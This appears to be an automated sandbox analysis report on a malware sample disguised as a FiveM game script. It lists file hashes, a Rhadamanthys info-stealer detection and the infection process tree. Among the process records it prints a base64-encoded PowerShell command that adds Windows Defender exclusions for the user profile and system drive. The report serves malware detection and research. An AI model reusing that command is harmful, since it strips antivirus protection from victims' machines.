Overview
overview
10Static
static
3SKRIPTGG-F...in.zip
windows7-x64
1SKRIPTGG-F...in.zip
windows10-2004-x64
1SKRIPTGG-F...DME.md
windows7-x64
3SKRIPTGG-F...DME.md
windows10-2004-x64
3SKRIPTGG-F...pt.rar
windows7-x64
10SKRIPTGG-F...pt.rar
windows10-2004-x64
7launcher.exe
windows7-x64
10launcher.exe
windows10-2004-x64
10SKRIPTGG-F...se.dll
windows7-x64
1SKRIPTGG-F...se.dll
windows10-2004-x64
1Resubmissions
27-03-2024 17:10
240327-vp3klabh7y 1027-03-2024 17:07
240327-vnfdnsbh4w 327-03-2024 17:03
240327-vknwmsbg61 10Analysis
-
max time kernel
66s -
max time network
68s -
platform
windows7_x64 -
resource
win7-20240215-en -
resource tags
arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system -
submitted
27-03-2024 17:03
Static task
static1
Behavioral task
behavioral1
Sample
SKRIPTGG-FIVEM-main.zip
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
SKRIPTGG-FIVEM-main.zip
Resource
win10v2004-20240226-en
Behavioral task
behavioral3
Sample
SKRIPTGG-FIVEM-main/README.md
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
SKRIPTGG-FIVEM-main/README.md
Resource
win10v2004-20231215-en
Behavioral task
behavioral5
Sample
SKRIPTGG-FIVEM-main/Skript.rar
Resource
win7-20240215-en
Behavioral task
behavioral6
Sample
SKRIPTGG-FIVEM-main/Skript.rar
Resource
win10v2004-20240226-en
Behavioral task
behavioral7
Sample
launcher.exe
Resource
win7-20240221-en
Behavioral task
behavioral8
Sample
launcher.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral9
Sample
SKRIPTGG-FIVEM-main/license.dll
Resource
win7-20240221-en
Behavioral task
behavioral10
Sample
SKRIPTGG-FIVEM-main/license.dll
Resource
win10v2004-20240226-en
General
-
Target
SKRIPTGG-FIVEM-main/Skript.rar
-
Size
4.6MB
-
MD5
5ca1a9888343fce41dc19ee85d5728c6
-
SHA1
004851b9a5327782dfffc773c7d352c3de6fa341
-
SHA256
26ce31dad5149454c39376256c88397b1a2e6c4e8f66b42cbce9f2cd904132cc
-
SHA512
3d0b20640da4695b3a2c70e39269dd6a48777c97e451385c8aebc876a5db430744d594118f217185cb4816d6e9c12f7c254deccad8652b710fbb9f5a83a5bf46
-
SSDEEP
98304:xI/GiwtepY3UjkkABs7ieskoAPS1tgX3Fr1gnzWMbz4Y:xqlpY3UtA+GePS1tuunzWtY
Malware Config
Signatures
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
svchost.exedescription pid Process procid_target PID 2712 created 1196 2712 svchost.exe 21 -
Executes dropped EXE 4 IoCs
Processes:
launcher.exeexplorer.exesvchost.exeexplorer.exepid Process 1596 launcher.exe 1940 explorer.exe 2712 svchost.exe 2288 explorer.exe -
Loads dropped DLL 5 IoCs
Processes:
launcher.exeexplorer.exeexplorer.exepid Process 1596 launcher.exe 1596 launcher.exe 1596 launcher.exe 1940 explorer.exe 2288 explorer.exe -
Processes:
resource yara_rule behavioral5/files/0x000500000001874a-66.dat upx behavioral5/memory/2288-68-0x000007FEF61B0000-0x000007FEF6616000-memory.dmp upx behavioral5/memory/2288-91-0x000007FEF61B0000-0x000007FEF6616000-memory.dmp upx -
Detects Pyinstaller 1 IoCs
Processes:
resource yara_rule behavioral5/files/0x0030000000016813-37.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 10 IoCs
Processes:
7zFM.exepowershell.exesvchost.exedialer.exepid Process 2572 7zFM.exe 2608 powershell.exe 2712 svchost.exe 2712 svchost.exe 2572 7zFM.exe 2280 dialer.exe 2280 dialer.exe 2280 dialer.exe 2280 dialer.exe 2572 7zFM.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
7zFM.exepid Process 2572 7zFM.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
7zFM.exepowershell.exedescription pid Process Token: SeRestorePrivilege 2572 7zFM.exe Token: 35 2572 7zFM.exe Token: SeSecurityPrivilege 2572 7zFM.exe Token: SeDebugPrivilege 2608 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
7zFM.exepid Process 2572 7zFM.exe 2572 7zFM.exe -
Suspicious use of WriteProcessMemory 40 IoCs
Processes:
cmd.exe7zFM.exelauncher.exeexplorer.exesvchost.exedescription pid Process procid_target PID 1624 wrote to memory of 2572 1624 cmd.exe 29 PID 1624 wrote to memory of 2572 1624 cmd.exe 29 PID 1624 wrote to memory of 2572 1624 cmd.exe 29 PID 2572 wrote to memory of 1596 2572 7zFM.exe 32 PID 2572 wrote to memory of 1596 2572 7zFM.exe 32 PID 2572 wrote to memory of 1596 2572 7zFM.exe 32 PID 2572 wrote to memory of 1596 2572 7zFM.exe 32 PID 2572 wrote to memory of 1596 2572 7zFM.exe 32 PID 2572 wrote to memory of 1596 2572 7zFM.exe 32 PID 2572 wrote to memory of 1596 2572 7zFM.exe 32 PID 1596 wrote to memory of 2608 1596 launcher.exe 33 PID 1596 wrote to memory of 2608 1596 launcher.exe 33 PID 1596 wrote to memory of 2608 1596 launcher.exe 33 PID 1596 wrote to memory of 2608 1596 launcher.exe 33 PID 1596 wrote to memory of 2608 1596 launcher.exe 33 PID 1596 wrote to memory of 2608 1596 launcher.exe 33 PID 1596 wrote to memory of 2608 1596 launcher.exe 33 PID 1596 wrote to memory of 1940 1596 launcher.exe 35 PID 1596 wrote to memory of 1940 1596 launcher.exe 35 PID 1596 wrote to memory of 1940 1596 launcher.exe 35 PID 1596 wrote to memory of 1940 1596 launcher.exe 35 PID 1596 wrote to memory of 2712 1596 launcher.exe 36 PID 1596 wrote to memory of 2712 1596 launcher.exe 36 PID 1596 wrote to memory of 2712 1596 launcher.exe 36 PID 1596 wrote to memory of 2712 1596 launcher.exe 36 PID 1596 wrote to memory of 2712 1596 launcher.exe 36 PID 1596 wrote to memory of 2712 1596 launcher.exe 36 PID 1596 wrote to memory of 2712 1596 launcher.exe 36 PID 1940 wrote to memory of 2288 1940 explorer.exe 37 PID 1940 wrote to memory of 2288 1940 explorer.exe 37 PID 1940 wrote to memory of 2288 1940 explorer.exe 37 PID 2712 wrote to memory of 2280 2712 svchost.exe 38 PID 2712 wrote to memory of 2280 2712 svchost.exe 38 PID 2712 wrote to memory of 2280 2712 svchost.exe 38 PID 2712 wrote to memory of 2280 2712 svchost.exe 38 PID 2712 wrote to memory of 2280 2712 svchost.exe 38 PID 2712 wrote to memory of 2280 2712 svchost.exe 38 PID 2712 wrote to memory of 2280 2712 svchost.exe 38 PID 2712 wrote to memory of 2280 2712 svchost.exe 38 PID 2712 wrote to memory of 2280 2712 svchost.exe 38
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1196
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\SKRIPTGG-FIVEM-main\Skript.rar2⤵
- Suspicious use of WriteProcessMemory
PID:1624 -
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\SKRIPTGG-FIVEM-main\Skript.rar"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2572 -
C:\Users\Admin\AppData\Local\Temp\7zOC0AD82E6\launcher.exe"C:\Users\Admin\AppData\Local\Temp\7zOC0AD82E6\launcher.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1596 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAaQB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAZgBnACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAcgBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAYQBjACMAPgA="5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2608
-
-
C:\Users\Admin\AppData\Local\Temp\explorer.exe"C:\Users\Admin\AppData\Local\Temp\explorer.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1940 -
C:\Users\Admin\AppData\Local\Temp\explorer.exe"C:\Users\Admin\AppData\Local\Temp\explorer.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2288
-
-
-
C:\Users\Admin\AppData\Local\svchost.exe"C:\Users\Admin\AppData\Local\svchost.exe"5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2712
-
-
-
-
-
C:\Windows\SysWOW64\dialer.exe"C:\Windows\system32\dialer.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2280
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"2⤵PID:2196
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4.7MB
MD5620024df612c13a4a33cf785384c2086
SHA1a6ae999723bea18c6d3acf2c52ed682f6226b7be
SHA256cd825788095cd61de39d98d6365ed80004cc55a64f4f115ef6bf532617bb0af1
SHA51234d4d8a423d98bf0b8d4f18dc980bed97e9492f0817bb1e2dff99fc8d9d0cfaa2687514eff7717b1310a2c858236614490e980390612901e08b69b6ded451bdd
-
Filesize
1.4MB
MD53f782cf7874b03c1d20ed90d370f4329
SHA108a2b4a21092321de1dcad1bb2afb660b0fa7749
SHA2562a382aff16533054e6de7d13b837a24d97ea2957805730cc7b08b75e369f58d6
SHA512950c039eb23ed64ca8b2f0a9284ebdb6f0efe71dde5bbf0187357a66c3ab0823418edca34811650270eea967f0e541eece90132f9959d5ba5984405630a99857
-
Filesize
4.4MB
MD5aba4fcf0d72b487887f315202bc43ae4
SHA1de51440c742c58f52f3b7cc2a1fcda5abd3d1ca8
SHA2568f312c17c2a525ac9bc0838e4d9f69db5bb20478ffa4880fb3a8b98caf0e25ef
SHA512fed41d5eb4a61c43bb3032c0d0b3d347d6b89a06d2928155f2e0baa59295ae71d3e689c3c78a584f2db64fd5ab3a06578623a8d41d7055b535c4d2317aef2bf9
-
Filesize
355KB
MD58a6f1580a5b9b94d7cd47cc6b1af1b9a
SHA1e68768afd59e18091d345cb300e859572e8d4c5c
SHA256bb1464e75c750d90c0c49d148c9e64eefe0c29b2f670d708c8085ddd3104dbfe
SHA5121663a9e0868b3f5d7e1edd30259024e419c2d190ec8c31e76e66aef0c8a0e02da0c829584214b9e2f76cbd349a53bf77d01d03e9b0e9c8a99eb18021b1d53309